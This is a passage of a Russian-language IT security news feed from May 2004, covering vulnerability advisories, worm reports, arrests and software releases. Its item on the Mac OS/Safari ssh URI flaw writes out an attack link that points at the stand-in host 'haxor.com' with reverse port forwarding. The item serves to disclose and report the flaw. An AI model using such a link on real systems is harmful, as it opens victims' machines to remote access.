Книга Ричарда Стивенса "TCP/IP Illustrated" (издательство Прентисс-Холл) - вещь культовая. Тем не менее, некоторая часть информации в ней на сегодняшний день несколько устарела, другая - потеряла свою актуальность. Профессор из университета г. Bath (Великобритания) J.H. Davenport сделал дополнения к книге Стивенса, в которых как раз обсуждаются все неактуальные на сегодняшний день пункты и дается дополнительная информация, которая была бы полезна сегодня, но которая отсутствует в книге.
HTML-формат
PDF-формат

29/05/2004 20:10 В Канаде задержали молодого вирусописателя
Канадская полиция арестовала 16-летнего подростка, подозреваемого в авторстве интернет-червя Randex, хорошо известного любителям IRC и пиринговых сетей. По информации ZDNet UK, полиция напала на след юного натуралиста благодаря наводке некоего Тони Койвунена (Toni Koivunen), занимающегося на досуге проблемами компьютерной безопасности. Тони разыскивал автора Randex'a в течение нескольких месяцев и, предположительно, напал на его след уже в феврале этого года. По всей видимости, канадской полиции потребовалось почти три месяца на то, чтобы накопить доказательную базу, достаточную для предъявления обвинения. Randex является примитивным интернет-червем, изначально распространявшимся по каналам IRC и пиринговым сетям. Захваченные с помощью червя компьютеры превращались в спамерские зомби-машины, контролируемые посредством встроенного IRC-клиента.
Источник

29/05/2004 14:36 ПО китайских разработчиков угрожает MS Office?
Недавно созданная пекинская компания Evermore Software выпустила в продажу альтернативу пакету Microsoft Office на рынках Китая, Японии и США. Пакет под названием EIOffice 2004, написанный на Java, работает как в системе Linux, так и в ОС Windows. Система включает в себя текстовый процессор, программу для работы с электронными таблицами и приложение для создания графиков и диаграмм, причём всё это работает в едином интерфейсе. Пакет также включает возможность импорта и экспорта файлов в форматах .DOC, .XLS, и .PPT. В отличие от MS Office, EIOffice использует единый формат файлов для всех документов и способен сохранять множество документов в одном файле для того, чтобы упростить связывание файлов, использующихся в рамках одного проекта. Китайская, английская и японская версии EIOffice 2004 уже доступны и распространяются по полуподписной схеме, вместо единовременной оплаты продукта. Подписка на 5 лет, включающая также обновление и техподдержку, обойдётся в $400, а на один год – всего в $150. Последняя цена полностью совпадает с таковой на редакции для студентов и преподавателей Students and Teacher пакета Microsoft Office.
CNEWS

29/05/2004 14:19 Южная Корея нашла в разведке КНДР хакерское подразделение
В спецслужбах КНДР действует элитное подразделение, занимающееся взломом компьютерных сетей Республики Корея. С таким заявлением выступил южнокорейский генерал Сон Йон Кюн на конференции в Сеуле, сообщает агентство Yonhap. По словам Сон Йюн Кюна, распоряжение о проведении кибертеррора против Республики Корея издано лично северокорейским лидером - Ким Чен Иром. «Следуя приказам Ким Чен Ира, Северная Корея учредила хакерское подразделение», - заявил Сон Йюн Кюн. Конференция, в ходе которой генерал рассказал о киберопасности КНДР, была организована корейским Агентством в области безопасности информации при Министерстве информации и коммуникаций. Участники конференции обсуждали вопросы безопасности в области разведки. Южнокорейский генерал убежден, что хакеры правительства КНДР неоднократно вторгались в сети властных структур Республики Корея и похищали секретную информацию. Заявления Сон Йон Кюна прозвучали на следующий день после того, как представители военных ведомств двух корейских государств обсудили предложения по снижению напряженности на межкорейской границе. В составе хакерского подразделения КНДР проходят службу выпускники военной академии имени Ким Ир Сена, занимающейся подготовкой кадров для военной разведки. Помимо хакерских задач элитное подразделение занимается пропагандой в интернете. Сон Йон Кюн упомянул 8 пхеньянских и 26 пропхеньянских сайтов, распространяющих в Сети идеи Чучхе. «Для противостояния растущему числу киберугроз со стороны КНДР необходимы комбинированные усилия», - считает южнокорейский генерал. Военная академия имени Ким Ир Сена ежегодно выпускает около 100 специалистов в сфере компьютерных технологий.
Источник

29/05/2004 13:44 Инфраструктура интернета дает сбои
Из-за проблемы в системе кэш-серверов Akamai 24 мая с 15:00 до 16:30 МСК многие высокопосещаемые веб-сайты замедлили свою работу, а некоторые вообще оказались недоступны. В течение полутора часов многие посетители eBay, Yahoo! и MSNBC вместо загрузки страницы видели сообщение об ошибке. Значительно ухудшилась поставка обновлений антивирусных баз пользователям программных продуктов Symantec, McAfee и TrendMicro, а также мультимедийного контента с сайта Apple. По результатам мониторинга Netcraft, серьезные проблемы с производительностью испытывали серверы BellSouth, General Motors, Coca Cola и Verizon. На сайте Akamai 24 мая в разделе для клиентов было опубликовано специальное заявление, в котором сообщается, что компания «осведомлена о сбое в работе сервиса этим утром, что повлияло на доставку контента. Мы нашли и устранили источник проблемы. Теперь трудности с доставкой контента уменьшатся или исчезнут». Судя по всему, проблема была технической, а не связана с DoS-атакой на сеть серверов по доставке контента (CDN), о которой сразу же появились слухи. Масштаб инфраструктуры Akamai, в которую входят от 12 тыс. до 15 тыс. серверов, делает возможность такой атаки практически нереальной. CDN-серверы Akamai помогают управлять трафиком на самых посещаемых сайтах интернета, кэшируя их содержимое и перераспределяя информационные потоки внутри глобальной сети. CDN-серверы используются также для отражения DoS-атак. Только благодаря инфраструктуре Akamai сайт Microsoft непрерывно держится в онлайне начиная с августа 2003 года, когда на него началась перманентная атака со стороны машин, инфицированных червем Blaster. В августе 2003 года Microsoft изменила собственные DNS-настройки так, что все запросы по адресу www.microsoft.com обрабатываются не машинами корпорации, а службой кэширования Akamai. Поскольку сеть Akamai является своеобразным «хребтом» системы распространения коммерческого контента в интернете, то она давно привлекает внимание хакеров. В частности, хакерская группа «Пушистый кролик» (Fluffi Bunny) заявляла, что ей удалось скопировать некоторые файлы во время вторжения в сеть в апреле 2001 г. По некоторой информации, хакерская группа собиралась использовать тысячи серверов Akamai для распределенной атаки на серверы системы DNS. В ответ на это Akamai заявила, что сеть надежно защищена и ее невозможно использовать таким образом. Предполагаемый лидер хакерской группы «Пушистый кролик» был арестован в прошлом году на специализированной выставке по компьютерной безопасности InfoSecurity Europe 2003 в Лондоне.
Вебпланета

29/05/2004 13:11 iScala UI Designer облегчает разработку интерфейса для Microsoft CRM
Компания Scala Business Solutions продемонстрировала новый продукт iScala User Interface (UI) Designer - связанный с Microsoft .NET инструментарий, позволяющий пользователям легко настраивать и создавать новые экраны для доступа к Microsoft CRM. С помощью iScala UI Designer можно намного быстрее настраивать экраны в Microsoft CRM и вносить более глубокие изменения, не используя при этом никаких инструментальных средств Microsoft Visual Studio, кроме встроенного проектировщика форм Form Designer. ПО iScala UI Designer, ориентированное на технических или бизнес-консультантов, позволяет партнерам создавать специализированные решения, которые можно легко интегрировать с будущими версиями. Кроме того, оно включает в себя средства локализации пользовательских интерфейсов на различных языках, включая кириллицу, языки с написанием справа налево и языки с двухбайтовыми символами.
О компании

29/05/2004 12:49 Macromedia выпустила Flash Player 7 для Linux
Macromedia завершила свой недельний цикл, обновив мультимедийный Flash-плейер для Linux-систем.
Уже доступный для платформы Windows и Macintosh, Macromedia Flash Player 7 теперь есть и для Linux: он может быть скачан с сайта Macromedia и будет включен в будущие Linux-системы от Novell, Red Hat, Sun Microsystems и Turbolinux. «Мы хотели убедиться в том, что Flash Player 7 для Linux будет соотвествовать производительным стандартам, присущим нашим другим версиям», — прояснил ситуацию Waleed Anbar, менеджер продуктов Macromedia.
nixp.ru

29/05/2004 12:05 Microsoft представила русскую версию Visual Basic .NET 2003
В Москве прошла презентация впервые выпущенной русской версии стандартной редакции среды разработки Microsoft Visual Basic .NET 2003, а также состоялись подведение итогов и награждение победителей конкурса разработчиков, приуроченных к этому событию. В презентации приняли участие Патрик Желле, директор группы локализации средств разработки корпорации Microsoft, Алексей Чубарь, директор департамента стратегических технологий представительства Microsoft в России и СНГ, представители партнеров Microsoft. Новая версия Microsoft Visual Basic .NET позволяет решать многие проблемы, связанные с разработкой настольных и веб-приложений. В частности, в ней реализован механизм автоматического развертывания, позволяющий избежать конфликтов между разными версиями совместно используемых динамических библиотек (DLL). Благодаря поддержке объектов ADO.NET разработчики могут использовать мощные классы и компоненты для создания встраиваемых в приложения гибких сценариев работы с данными. В состав Visual Basic .NET также входит специальный мастер, позволяющий модернизировать написанный ранее код приложений Visual Basic 6.0 для работы в среде Visual Basic .NET. Кроме того, допускается использование отдельных компонентов Visual Basic в приложениях Visual Basic .NET 2003.
Источник

29/05/2004 11:32 AOL выпустит новую версию Netscape
В четверг компания America Online сообщила, что летом выйдет новая версия веб-браузера Netscape, хотя не похоже, чтобы компания возвращалась к серьезной работе над браузером. Представительница AOL сказала, что новое ПО будет основано на коде Mozilla 1.7, разработанном open source-отделением Netscape. По ее словам, это незначительный апгрейд, в который войдут несколько секьюрити-патчей, но интерфейс останется в основном неизменным. «Гигантским шагом вперед это не назовешь», — признала она. Netscape 7.2 выходит на фоне слухов о том, что AOL едва ли не прекратила работу над браузером после прошлогодних сокращений, затронувших 500 сотрудников компании в Калифорнии, включая большинство членов команды, работающей над Netscape. Некоторых программистов AOL перевела в другие офисы, в том числе в новый исследовательский центр в Бангалоре (Индия). Сокращения последовали за решением по антимонопольному иску родительской компании Time Warner против Microsoft, которое принесло медиагиганту $750 млн и в числе прочего семилетний контракт на использование в службе AOL браузера Microsoft Internet Explorer. Предыдущее обновление Netscape вышло в июле прошлого года и добавило поддержку неанглийских имен доменов, а также фильтр спама на базе байесова анализа входящей почты.
Подробности

29/05/2004 10:59 Калифорнийские сенаторы помешают Google читать чужую почту
Сенат штата Калифорния потребовал от компании Google ограничить функции новой почтовой службы Gmail, которая начала работать с апреля этого года. Недовольство законодателей вызвало намерение Google отслеживать содержание писем, чтобы вставлять в них соответствующую теме сообщений рекламу, сообщается на сайте BBC News. В связи с появлением нового сервиса сенатор Лиз Фигуэро (Liz Figueroa) предложила законопроект, который должен гарантировать тайну переписки. Он позволяет Google отслеживать почтовые сообщения в режиме реального времени, однако запрещает создавать архивы результатов такого мониторинга. Кроме того, проект закона должен помешать Google собирать личную информацию о пользователях и продавать ее другим компаниям. За счет мониторинга содержания писем и размещения соответствующей рекламы Google рассчитывает компенсировать расходы на предоставление почтового ящика размером в 1 гигабайт. При этом компания обещает, что ее сотрудники не будут читать сообщения - анализом содержания займется компьютер. Руководство Google заявило, что участвует в работе над законопроектом и намерено гарантировать своим клиентам тайну переписки. После голосования в законодательном собрании Калифорнии закон будет направлен на утверждение губернатору штата Арнольду Шварценеггеру, который вправе отменить ограничения.
Источник

28/05/2004 16:14 Американского спамера посадили на семь лет
Житель штата Нью-Йорк, отославший 825 миллионов спам-сообщений, приговорен судом штата к семи годам тюрьмы за свою деятельность, сообщает агентство Reuters. В апреле суд признал Говарда Кармака (Howard Carmack), известного как "Спамер из Баффало", виновным по всем 14 предъявленым обвинениям, среди которых такие как "незаконное получение идентификационных данных" и "мошенничество". Для рассылки спама мошенник использовал чужие почтовые акккаунты и фальшивые адреса. В прошлом году интернет-провайдер EarthLink Inc. выиграл у Кармака иск на сумму в 16,5 миллионов долларов. Показания работников EarthLink использовались против спамера в суде. Впрочем, у Кармака есть шанс выйти из тюрьмы досрочно. В случае, если в заключении он будет отличаться примерным поведением, срок сократят до трех с половиной лет.
lenta.ru

28/05/2004 14:39 OpenSSL уязвимость в Novell iManager и eDirectory
Novell подтвердила наличие множества OpenSSL уязвимостей в Novell iManager и eDirectory, которые позволяют удаленному пользователю провести DoS атаку. Уязвимы Novell eDirectory 8.x, Novell iManager 1.5.x и Novell iManager 2.0.x. Тип уязвимости - "Highly critical". Подробнее о уязвимостях можно узнать в Secunia Advisory: SA11728, SA9886, SA11139.
Оригинальное описание уязвимости от Novell, Патч.

28/05/2004 14:30 Переполнение буфера в Apache mod_ssl
Secunia сообщает об обнаруженной уязвимости в Apache mod_ssl, позволяющей провести DoS атаку. Уязвимость присутствует благодаля ошибке в функции ssl_util_uuencode_binary(), обрабатывающей клиентские сертификаты. Неправильная проверка ограничений приводит к возможности переполнения буфера на стеке при обработке специально созданного сертификата, содержащего очень длинный загодовок DN, более 6KB. Успешное использование уязвимости требует включенной опции "FakeBasicAuth" и клиентского сертификата от доверенного CA. Тип уязвимости - "Moderately critical". Уязвимы Apache 2.0.x, Apache 1.3.x с mod_ssl 2.x.
Secunia Advisory

28/05/2004 14:13 Новая версия Maс OS X 10.3.4 содержит старые дыры
Продолжается эпопея URI-уязвимостей в Maс OS. Вчера секьюрити-компания Secunia обновила Advisory #SA11689 (http://secunia.com/advisories/11689), тип которой "чрезвычайно критичный". Дело в том, что, как оказалось, новая, только что выпущенная версия Maс OS X 10.3.4 содержит все те же дыры, о которых сообщается в Advisory. Напомним, что в Maс OS уязвим обработчик URI, уязвимости обнаруживаются при обработке "help", "disk", "ftp", "ssh" URI команд. В различной конфигурации уязвимости позволяют от незаметной загрузки и запуска вредоносного кода на уязвимой машине до открытия прямого соединения к удаленной машине и проброски портов. По-видимому это внутренняя проблема всей структуры обработчика URI в Maс OS. Возможно, что и другие обработчики, кроме перечисленных, также уязвимы различными способами, говорится в Advisory. Ожидается, что не только браузеры, но и другие программы, использующие URI handler, также могут быть уязвимы. Apple выпускала патч закрывающий "help" URI уязвимость. Остальные уязвимости подтверждены на полностью пропатченной Mac OS X 10.3.3 и, как оказалось, на новой Maс OS X 10.3.4.
SearchSecurity.com

28/05/2004 13:24 Yahoo добавила Anti-Spyware в свой тулбар
Yahoo добавила новую функцию в свой тулбар, которая будет позволять пользователям обнаруживать шпионские программы на PC. Yahoo сообщила, что их "Anti-Spy beta" - так называется бета версия нового сервиса - чрезвычайно прост в использовании и поможет пользователям при работе "онлайн". Новый сервис базируется на программном обеспечении Pest Patrol. Теперь Yahoo Toolbar, в дополнение к уже имеющимся функциям интернет поиска, блокировки pop-up окон и управления закладками, будет содержать и анти-шпионскую функциональность. Yahoo Toolbar доступен для скачивания здесь.
Источники: theinquirer.net, reuters.com

28/05/2004 13:06 Появился первый 64-битный вирус
Секьюрити-компания Symantec сообщила в четверг о том, что обнаружена первая угроза для 64-bit Windows систем - вирус, получивший название W64.Rugrat.3344. Представитель Cupertino, сказал, что это не совсем вирус, а скорее червь, разработанный кем-то, чтобы показать наличие уязвимостей с данном типе систем. Однако, представители Symantec заявили, что W64.Rugrat.3344 может успешно атаковать 64-bit файлы Microsoft Windows. Вирус не инфицирует 32-битные файлы и не работает на 32-битных Windows системах. Поскольку 64-битные системы только начинают распространяться, Symantec считает, что этот вирус не представляет большой опасности. W64.Rugrat.3344 написан на ассемблере для IA64 (Intel Architecture) и инфицирует IA64 исполняемые файлы, исключая dll, находящиеся в той же папке что и вирус.
CNET News.com

27/05/2004 20:13 Microsoft укрепляет защиту базы данных
Во вторник компания объявила, что в ее СУБД SQL Server 2005 с кодовым названием Yukon войдут средства шифрования, затрудняющие доступ к информации для хакеров и других не наделенных соответствующими правами пользователей. Microsoft уже предлагает инструменты шифрования данных, передаваемых по сети между SQL Server и клиентскими приложениями. В новой версии SQL Server, которую компания планирует выпустить в начале 2005 года, будут шифроваться и данные, хранящиеся в самой БД, что сделает ее намного более устойчивой к атакам, говорит продакт-менеджер Microsoft Кристен Уорд. В начале этого года Microsoft перенесла выпуск SQL Server 2005 на первое полугодие следующего года. Новая версия должна обеспечить вычислительные возможности, позволяющие СУБД лучше конкурировать с продуктами Oracle и IBM. Кроме того, в нее войдет новая концепция унифицированной системы хранения данных, которая облегчит поиск и извлечение информации. Кроме этого, Microsoft выпустит программное обеспечение Best Practices Analyzer Tool, которое администраторы баз данных смогут использовать для точной настройки своих БД с применением опыта, накопленного Microsoft. Этот инструмент, который будет работать и с текущей версией СУБД Microsoft SQL Server 2000, обеспечит администраторов рекомендациями по разным вопросам, таким как способы повышения производительности и повышение эффективности резервного копирования данных.
Подробности

27/05/2004 13:38 Новый сайт по уязвимостям ПО Windows
Известный китайский исследователь компьютерной безопасности Лю Ди Ю, обнаруживший много дыр в браузере Internet Explorer (и не только в нём) создал в Интернете сайт, который содержит архив обнаруженных уязвимостей в основных составляющих ОС Windows: Internet Explorer, Outlook, Windows Media Player, JVM (виртуальная машина Java). Архив ведётся с 200 года. Помимо этого, при помощи специального PHP-скрипта 3 раза в день производится текущее обновление сайта на основании анализа сообщений списков рассылки (сайтов): BugTraq, fulldisclosure, Microsoft.
iebug.com/

27/05/2004 13:18 Локальная уязвимость в ОС FreeBSD
Как сообщает команда разработчиков FreeBSD, обнаружена локальная уязвимость в ОС FreeBSD, которая может позволить пользователю, имеющему полномочия на чтение файла предотвратить его изменение. Уязвимость связана с системным вызовом msync(2), используемым приложениями, чтобы убедиться в том, что страница памяти помещена во постоянное место хранения (жёсткий диск). Ввиду программистской ошибки в ходе выполнения операции MS_INVALIDATE возможна ситуация, в которой содержимое файла в виртуальной памяти и на жёстком диске будут отличаться. Патчи для версий 4.8, 4.9, 4.10, 5.2 доступны.
Бюллетень

27/05/2004 12:41 Вышла Maс OS X 10.3.4
В среду компания Apple представила обновленную версию операционной системы Mac OS X 10.3.4 Panther и обновленную версию Panther Server с тем же порядковым номером, сообщает "Компьюлента". Среди обновлений в пользовательской версии Mac OS - улучшенная система файлового обмена и обновленная версия службы каталогов для Macintosh и Unix, улучшенная поддержка беспроводных сетей и обновленние поддержки OpenGL. Кроме того, в новой версии ОС обновились драйверы для видеокарт ATI и nVidia, небольшие обновления произведены в ПО для записи компакт-дисков. MP3-плеер iPod в новой версии ОС теперь распознается программами iTunes и iSync даже в случае подключения через порт USB 2.0. Была расширена поддержка устройств, подключающихся через порты FireWire и USB 2.0. Обновились и программы, включенные в ОС, в том числе адресная книга, почтовый клиент, браузер Safari, приложения Stickies и QuickTime, улучшена поддержка программ от сторонних производителей. Объем файла обновления для существующих версий Mac OS составляет 41 мегабайт, его можно скачать с помощью системы Software Update.
Подробности

27/05/2004 12:34 Выход FreeBSD 4.10-RELEASE
Ну вот и свершилось! Праздник среди почитателей отличной ОС FreeBSD наконец-то наступил! Сегодня Ken Smith от имени команды разработчиков FreeBSD объявил о выходе новой версии этой ОС - 4.10-RELEASE. Как пишется в анонсе, этот релиз является последним релизом в ветви STABLE. Относительно версии 4.9, выпущенной в октябре 2003 г. были сделаны дополнения к набору софта, включённого в базовый набор дистрибутива, сделаны обновления, связанный с обновлением системы безопасности и добавлены различные багофиксы. Также версия 4.10 станет первым релизом в ветви "Errata Branch" и в рамках этой ветви планируется выпустить FreeBSD 4.11-RELEASE - на основании возможных обнаруженных прорехах в системе безопасности. В дальнейем всё внимание разработчиков будет сосредоточено на ветви 5.х и всем пользователям рекомендуют постепенно мигрировать на неё (в частности, на версию вскоре ожидаемую - 5.3). FreeBSD 4.10 доступна для скачивания в виде ISO-образов (2 CD).
Анонс

27/05/2004 11:44 Palm OS 5 заговорила по-русски
Компания Paragon Software объявила о выпуске новой версии системы локализации для Palm OS под названием PiLoc 3.6. Эта программа адаптирует для российского пользователя все доступные в настоящее время компьютеры на базе платформ Palm OS 5.0 и выше. Новая версия приобрела ряд дополнительные функций, например возможность не только закачивать новые шрифты (до 20 видов), но и легко переключать их в настройках Font Style, сохранять индивидуальные настройки пользователя (кодировки, раскладки, перевод интерфейса) для каждого установленного языка и др. Также в PiLoc 3.6 появились почтовые агенты, поддерживающие русские кодировки писем (Snapper Mail, Mail), корректно обрабатывается поворот экрана на модели Тungsten Т3, упрощено распознавание очертаний символа "Б" и реализована возможность посылать русскоязычные SMS сообщения для смартфона Treo 600. Одновременно с системой локализации вышла и новая версия PiLoc Monitor 1.4, а также утилита--компилятор шрифтов, работающая под PiLoc версии 2.25 - 3.6.
osp.ru

27/05/2004 11:15 Microsoft обещает продлить поддержку продуктов
Во вторник Microsoft обнародовала новую долгосрочную политику поддержки, а также анонсировала технологии, направленные на повышение степени безопасности и пресечение спама. Выступая на ежегодной конференции для ИТ-администраторов TechEd в Сан-Диего, Энди Лиз, вице-президент Microsoft по серверным продуктам и инструментам, заявил, что отныне компания гарантирует минимум 10-летнюю поддержку всех своих продуктов для предприятий и разработчиков. Сейчас Microsoft прекращает всяческую поддержку через восемь лет. Компанию активно критиковали за отказ поддерживать старые продукты, в том числе версии операционной системы Windows, которые всё ещё широко используются. Лиз сказал, что новая политика гарантирует корпоративным заказчикам большую ответственность. «С момента поставки вам будет обеспечен гораздо более предсказуемый уровень поддержки». Лиз пообещал также ряд подвижек на фронте e-mail, особенно в части пресечения непрошеной почты. В рамках программы выпуска Service Pack 1 для сервера электронной почты Exchange 2003 компания начнёт предоставлять всем заказчикам возможность установки модуля блокировки спама — интеллектуального фильтра сообщений (Intelligent Message Filtering, IMF). Раньше фильтры предоставлялись только тем, кто заключил с Microsoft лицензионное соглашение Software Assurance. «Мы ни в коем случает не отказываемся от Software Assurance, — пояснил старший директор по Exchange Ким Эйкерс. — Но, учитывая потребности заказчиков и разгул спама, мы решили, что IMF должен быть доступен для всех». Лиз пообещал также усовершенствования в системе блокировки спама посредством функции E-mail Caller ID, которая проверяет данные отправителя сообщения, позволяя блокировать подложную почту. Microsoft планирует ввести эту технологию в дополнение к Exchange Exchange Edge Services, которое выйдет в будущем году.
Подробности

27/05/2004 10:47 Недельный отчет о вирусах Panda Software
Выпущен очередной еженедельный отчёт о вирусной активности прошедшей недели от Panda Software. В нём рассмотрены черви Bobax.A, Bobax.B, Bobax.C, Kibuv.A и Lovgate.AF, а также троянец Ldpinch.W.
Отчёт

27/05/2004 10:06 Американские пользователи не видят большого вреда в черве Sasser
Интернет-червь Sasser, впервые обнаруженный 1 мая, поразил менее одного процента всех компьютеров под управлением операционной системы Windows. Таковы результаты опроса, проведенного специалистами в области компьютерной безопасности из компании TruSecure, сообщает сайт газеты Sydney Morning Herald. В поле зрения TruSecure попало около 8,1 млн компьютеров, владельцы которых проживают в основном в США и Канаде. При этом лишь 55 тыс. человек заявили о заражении своих машин червем Sasser. Об убытках, вызванных вредоносной программой, сообщили лишь 29% тех, в чьи компьютеры проник вирус. 73% владельцев инфицированных компьютеров в качестве главного вредоносного эффекта Sasser назвали повышение активности вспомогательного меню операционной системы. В настоящее время общий размер потерь, нанесенных червем Sasser, оценивается в 979 млн долларов США. При этом 522 млн долларов приходится на Северную Америку. Для сравнения - ущерб от Lovesan в Северной Америке составил 1,3 млрд долларов. Sobig обошелся владельцам компьютеров в 1,6 млрд.
Источник

26/05/2004 16:02 Ударим вардрайвингом по раздолбайству админов!
В начале июня планируется проведение широкомасшатбной акции по борьбе с использованием незащищенных WiFi-сетей. В 11 странах мира добровольцы будут выявлять незащищенные точки доступа, фиксировать их координаты при помощи GPS-приемников и вносить информацию в WiGLE (Wireless Geographic Logging Engine). Во время прошлой акции (июль 2003) обнаружилось, что 67% из 88 000 точек доступа не использовали даже защиту при помощи WEP (Wired Equivalent Privacy, устаревший к настоящему времени протокол, который должен быть заменен на WiFi Protected Access). Мероприятие пройдет с 12 по 19 июня. Дополнительные подробности можно узнать по адресу - http://www.worldwidewardrive.org/wwwd4/index.html. На просторах exUSSR мероприятие трудно реализуемо ввиду не очень широкой распространенности у народонаселения GPS-приемников и электронных карт с нормальной привязкой к координатам...
bugtraq.ru

26/05/2004 14:37 Новый инструмент для программистов от @stake.
В понедельник известная секьюрити-компания @stake, расположенная в Кембридже (штат Массачусетс, США) объявила о выпуске инструментария для программистов под названием SmartRisk Analyzer, предназначенного для анализа компьютерного кода программ, написанных на C, C++ и Java с целью нахождения в нём потенциально опасного кода, который мог бы привести к переполнению буфера. Используя технологию под названием "глубокий бинарный анализ" ("deep binary analysis"), продукт позволяет сканировать компьютерный код даже после компиляции (или трансляции). О новом продукте сообщил компьютерной общественности вице-президент компании Chris Wysopal. Инструмент тесно взаимодействует как с API для обеспечения безопасности и криптографии, так и с сетевыми файловыми сервисами. При анализе кода используется собственная база @stake, в которой содержится около 400 примеров уязвимых и потенциально опасных фрагментов кода. Необходимо отметить, что нечто подобное в апреле было представлено компанией Fortify Software Inc., расположенной в Menlo Park, California. Продукт назывался Fortify Source Code Analysis и позволял сканировать исходный код и сравнивать с базой, содержащей 500 примеров уязвимого кода. SmartRisk Analyzer для C и C++ для платформ Windows и SPARC (от Sun) будет доступен в понедельник (следующий?), а для Java планируется к выпуску в июне. Может работать в ОС - Windows XP/2K/2003.
Анонс

26/05/2004 13:45 Эпопея URI-уязвимостей в MacOS продолжается
В дополнение к предыдущим URI-уязвимостям в MacOS появилась ещё одна. На сей раз на сайте insecure.ws опубликовано сообщение о существовании уязвиимости в обработке URI в браузере Safari. При задании в поле URI ссылки на ssh могут выполняться произвольные команды (с выставленной опцией ProxyCommand). Также можно использовать в формируемом URI опцию проброса портов -R, для чего необходимо софрмировать следующую ссылку - ssh://ssh haxor.com -R port:localhost:port. Как пишет сам автор, вполне возможно, что уязвимость существует и в других браузерах - Camino,Firefox,Mozilla, однако ему её не удалось воспроизвести на них (возможно, из-за багов в обработке переключателей на использующемся Gnome 2.6.1. Также возможно существование уязвимости в других ОС, однако подтвердить это не удалось. Проверена только защита браузера konqueror (не сработало). На странице с описанием приводится ссылка на демо-страницу с эксплоитом. Кроме того, существует частный патч для латания уязвимости, ссылка на который приведена ниже.
Описание
Патч

26/05/2004 13:09 Lucent покупает производителя VoIP-систем
Компания Lucent Technologies восполнит недостаток ассортимента предлагаемого ею оборудования и программного обеспечения VoIP, приобретя за 295 млн. долл. компанию Telica. В результате сделки в распоряжение Lucent перейдут медиашлюз, сигнальный шлюз и контроллер медиашлюзов производства Telica. Системы будут включены в линейку продуктов Lucent Accelerate VoIP Solutions, в состав которой также входят сервисные приложения типа программного коммутатора IP-телефонии и VPN-сервера. В Lucent рассчитывают, что покупка позволит ей нарастить долю рынка оборудования VoIP, объем которого, по прогнозу IDC, превысит к 2007 году 15 млрд. долл. Как отмечают аналитики, Telica Plexus 9000 - один из самых мощных медиашлюзов из имеющихся сейчас на рынке.
osp.ru

26/05/2004 10:14 Lindows одержала предварительную победу над Microsoft
Компания Lindows одержала еще одну небольшую победу над Microsoft в Соединенных Штатах. В понедельник в ходе девятой сессии выездного апелляционного суда было постановлено, что термин "окна" (windows) являлся общеупотребительным до ноября 1985 года, то есть до того момента, как софтверный гигант выпустил первую версию своей всемирно известной операционной системы. Ранее в этом году Microsoft удалось одержать победу над компанией Майкла Робертсона в Бенилюксе (Бельгия, Нидерланды, Люксембург), где операционные системы Lindows теперь продаются под торговой маркой Linspire. Однако в США дело пока находится на стадии рассмотрения, и в ближайшее время изучением вопроса о правах Microsoft на торговую марку Windows займется суд. По словам представителей Microsoft, решение апелляционного суда лишь отодвигает временные рамки исхода процесса, но нисколько не меняет его сути. Другими словами, софтверный гигант полностью уверен в своей окончательной победе. В Lindows же, напротив, считают, что теперь их шансы на выигрыш дела существенно возросли, поскольку защита компании строится, в основном, на том, что термин "окна" характеризует особенности современных интерфейсов и не может являться исключительной торговой маркой Microsoft
"Компьюлента"

26/05/2004 10:10 Cетевой червь Padobot.
"Лаборатория Касперского" сообщает об обнаружении двух версий нового сетевого червя Worm.Win32.Padobot. Червь распространяется, используя для своего размножения уязвимость в службе LSASS Microsoft Windows. Ее описание приведено в Microsoft Security Bulletin MS04-011. После заражения инфицированная машина выводит сообщение об ошибке "LSASS service failing", после чего может попытаться перезагрузиться. Червь открывает на зараженной машине порты TCP 113, 3067 и 2041 для приема команд. При запуске червь копирует себя в системный каталог Windows с произвольным именем и регистрируется в ключе автозапуска системного реестра:[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "WinUpdate"="%system%\[имя файла]".
Также создает ключ: [HKLM\SOFTWARE\Microsoft\Wireless] "Server"="1". Создает в памяти уникальные идентификаторы "10", "u2", и "uterm5" для определения своего присутствия в системе.
Лаборатория Касперского

26/05/2004 09:58 Азиатский хакер подобрался к американским баллистическим ракетам
Полиция Республики Корея совместно с коллегами из США приступила к выяснению обстоятельств хакерской атаки, в ходе которой житель одной из азиатских стран взломал несколько компьютеров сети аэрокосмического департамента ВВС США, сообщает сайт газеты Chosunilbo. Для получения доступа к машинам американской военной авиации злоумышленник использовал компьютеры двух корейских компаний. Инцидент произошел в феврале этого года. В США сразу посчитали инцидент серьезным и в спешном порядке попросили корейские власти расследовать его. Для установления личности преступника следственные органы двух стран наладили самое тесное взаимодействие. Аэрокосмический департамент ВВС США - одно из крупнейших управлений американского оборонного ведомства и главный орган, ответственный за пуски межконтинентальных баллистических ракет, обеспечение работы спутников и радарного оборудования. Следственным органам достоверно известно, что хакерская атака важного стратегического объекта была проведена с территории одного из азиатских государств. Название этого государства не приводится из дипломатических соображений. Компании, компьютеры которых были использованы в рамках атаки, располагаются в южнокорейских городах Инчхон и Тэгу. Выбор злоумышленником южнокорейских машин в качестве инструмента для нападения на американские военные компьютеры, вероятно, обусловлен высоким уровнем развития интернета в этой стране и его тесной интеграцией с сетями в США. Руководство и персонал южнокорейских компаний не подозревали о том, что их машины взломаны и используются для проникновения в сеть американского военного ведомства. Полиция отметила высокую квалификацию хакера, использовавшего одновременно два компьютера для усложнения задачи правоохранительных органов. Помимо американской военной сети хакер получил доступ к компьютерам, расположенным еще в 12 странах, в том числе на Тайване и в Японии. В США и Республике Корея полагают, что уже сумели установить личность преступника и намереваются направить запрос об экстрадиции правительству его страны.
viruslist.ru

26/05/2004 09:45 Microsoft решила завоевать рынок корпоративных средств сетевой безопасности
Компания Microsoft в понедельник объявила о своих планах по выходу на рынок корпоративных программных средств сетевой безопасности. Как сообщает Reuters, на конец этого года запланирован выход нового продукта от Microsoft - Internet Security and Acceleration (ISA) Server 2004. Эта программа является переработкой инструмента ISA 2000, предназначенного для обеспечения безопасности корпоративных сетей, контроля за параметрами безопасности и для оптимизации работы сетевых приложений. Для продвижения продукта на новом рынке Microsoft намеревается продавать его вместе с сетевым оборудованием своих партнеров - в частности, Hewlett-Packard и Network Engines. Таким образом, отмечают аналитики, Microsoft пытается завоевать новый для себя рынок, на котором традиционно доминируют компании CheckPoint Software и SonicWall. Цена копии ISA Server 2004 для одного сервера, как ожидается, составит 1499 долларов. Довольно любопытное начинание компании, не успевающей вовремя закрывать дыры в "сами_знаете_какой" операционной системе. Впрочем, с финансовой точки зрения, вполне обоснованное.
Подробности

26/05/2004 09:34 Webmoney.by закрыт милицией
